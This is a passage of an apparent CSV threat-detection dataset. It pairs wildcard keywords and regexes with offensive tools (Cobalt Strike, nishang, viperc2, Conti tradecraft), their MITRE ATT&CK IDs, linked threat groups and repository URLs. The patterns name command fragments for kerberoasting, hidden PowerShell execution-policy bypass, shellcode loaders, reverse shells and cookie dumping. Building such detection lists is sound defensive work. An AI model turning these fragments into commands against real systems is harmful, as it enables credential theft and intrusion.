Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","43471" "*Execute-ACLight2.bat*",".{0,1000}Execute\-ACLight2\.bat.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","43472" "*execute-assembly *",".{0,1000}execute\-assembly\s.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","43473" "*execute-assembly *.exe *",".{0,1000}execute\-assembly\s.{0,15}\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - 
Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","43474" "*execute-assembly *.exe /ldap:all /filter:sysvol*netlogon*ipc$*print$*",".{0,1000}execute\-assembly\s.{0,100}\.exe\s\/ldap\:all\s\/filter\:sysvol.{0,1000}netlogon.{0,1000}ipc\$.{0,1000}print\$.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","43475" "*execute-assembly *asreproast*",".{0,1000}execute\-assembly\s.{0,100}asreproast.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","43476" "*execute-assembly *kerberoast*",".{0,1000}execute\-assembly\s.{0,100}kerberoast.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","43477" "*execute-assembly -c EnableAllTokenPrivs.EnableAllTokenPrivs *",".{0,1000}execute\-assembly\s\-c\sEnableAllTokenPrivs\.EnableAllTokenPrivs\s.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","43478" "*execute-assembly 
SharpBlock*",".{0,1000}execute\-assembly\sSharpBlock.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point execution","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","43479" "*execute-assembly svchost *.exe*",".{0,1000}execute\-assembly\ssvchost\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","43480" "*execute-assembly*Seatbelt*",".{0,1000}execute\-assembly.{0,1000}Seatbelt.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","43481" "*execute-assembly*sharpcookiemonster*",".{0,1000}execute\-assembly.{0,1000}sharpcookiemonster.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","43482" "*execute-assembly*sigflip*",".{0,1000}execute\-assembly.{0,1000}sigflip.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","43483" "*executeAssembly.nim*",".{0,1000}executeAssembly\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","43484" "*execute-assembly.py*",".{0,1000}execute\-assembly\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","43485" "*Execute-Command-MSSQL*",".{0,1000}Execute\-Command\-MSSQL.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","43486" "*Execute-DNSTXT-Code*",".{0,1000}Execute\-DNSTXT\-Code.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","43487" "*execute-dotnet-assembly*",".{0,1000}execute\-dotnet\-assembly.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43488" "*execute-pe svchost whoami.exe*",".{0,1000}execute\-pe\ssvchost\swhoami\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","43489" "*execute-pe.py*",".{0,1000}execute\-pe\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","43490" "*executepersistence*",".{0,1000}executepersistence.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 
- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","43491" "*execute-Pezor*",".{0,1000}execute\-Pezor.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 
- T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","43492" "*Executes a chosen Mimikatz command*",".{0,1000}Executes\sa\schosen\sMimikatz\scommand.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","43493" "*Executes a powershell command on the remote host. 
Requires PSCMD*",".{0,1000}Executes\sa\spowershell\scommand\son\sthe\sremote\shost\.\sRequires\sPSCMD.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","43494" "*Executes everything but DCSync - requires admin*",".{0,1000}Executes\severything\sbut\sDCSync\s\-\srequires\sadmin.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","43495" "*execute-shellcode.py*",".{0,1000}execute\-shellcode\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","43496" "*Executing the exploit this may take a while.........................................*",".{0,1000}Executing\sthe\sexploit\sthis\smay\stake\sa\swhile\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..{0,1000}","offensive_tool_keyword","POC","Exploit tool for 
CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#content #linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","43497" "*Execution_CommandAndScriptingInterpreter_UploadAndExec.py*",".{0,1000}Execution_CommandAndScriptingInterpreter_UploadAndExec\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43498" "*Execution_UserExecution_CallbackCreateThreadpoolWait.py*",".{0,1000}Execution_UserExecution_CallbackCreateThreadpoolWait\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43499" "*Execution_UserExecution_CallbackCreateTimerQueue.py*",".{0,1000}Execution_UserExecution_CallbackCreateTimerQueue\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and 
technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43500" "*Execution_UserExecution_CallbackEnumChildWindows.py*",".{0,1000}Execution_UserExecution_CallbackEnumChildWindows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43501" "*Execution_UserExecution_CallbackEnumWindows.py*",".{0,1000}Execution_UserExecution_CallbackEnumWindows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43502" "*Execution_UserExecution_DirectConnectReverseHTTPS.py*",".{0,1000}Execution_UserExecution_DirectConnectReverseHTTPS\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and 
weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43503" "*Execution_UserExecution_DirectConnectReverseTCPRc4.py*",".{0,1000}Execution_UserExecution_DirectConnectReverseTCPRc4\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43504" "*Execution_UserExecution_FakePPID.py*",".{0,1000}Execution_UserExecution_FakePPID\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43505" "*Execution_UserExecution_LinuxBaseShellcodeLoader.py*",".{0,1000}Execution_UserExecution_LinuxBaseShellcodeLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and 
weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","#linux","N/A","10","","N/A","","","","43506" "*Execution_UserExecution_LinuxSelfGuardLoader.py*",".{0,1000}Execution_UserExecution_LinuxSelfGuardLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","#linux","N/A","10","","N/A","","","","43507" "*Execution_UserExecution_NtCreateSection.py*",".{0,1000}Execution_UserExecution_NtCreateSection\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43508" "*Execution_UserExecution_Syscall_inject.py*",".{0,1000}Execution_UserExecution_Syscall_inject\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the 
tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43509" "*Execution_UserExecution_VSSyscallProject.py*",".{0,1000}Execution_UserExecution_VSSyscallProject\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43510" "*-ExecutionPolicy Bypass -File Win10.ps1 *",".{0,1000}\-ExecutionPolicy\sBypass\s\-File\sWin10\.ps1\s.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","43511" "*-ExecutionPolicy Bypass -File Win11.ps1 *",".{0,1000}\-ExecutionPolicy\sBypass\s\-File\sWin11\.ps1\s.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation 
OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","43512" "*-ExecutionPolicy Bypass -WindowStyle Hidden -Command & {taskkill /f /im mmc.exe*",".{0,1000}\-ExecutionPolicy\sBypass\s\-WindowStyle\sHidden\s\-Command\s\&\s\{taskkill\s\/f\s\/im\smmc\.exe.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","43513" "*exegol4thewin*",".{0,1000}exegol4thewin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43514" "*ExegolController.py*",".{0,1000}ExegolController\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - 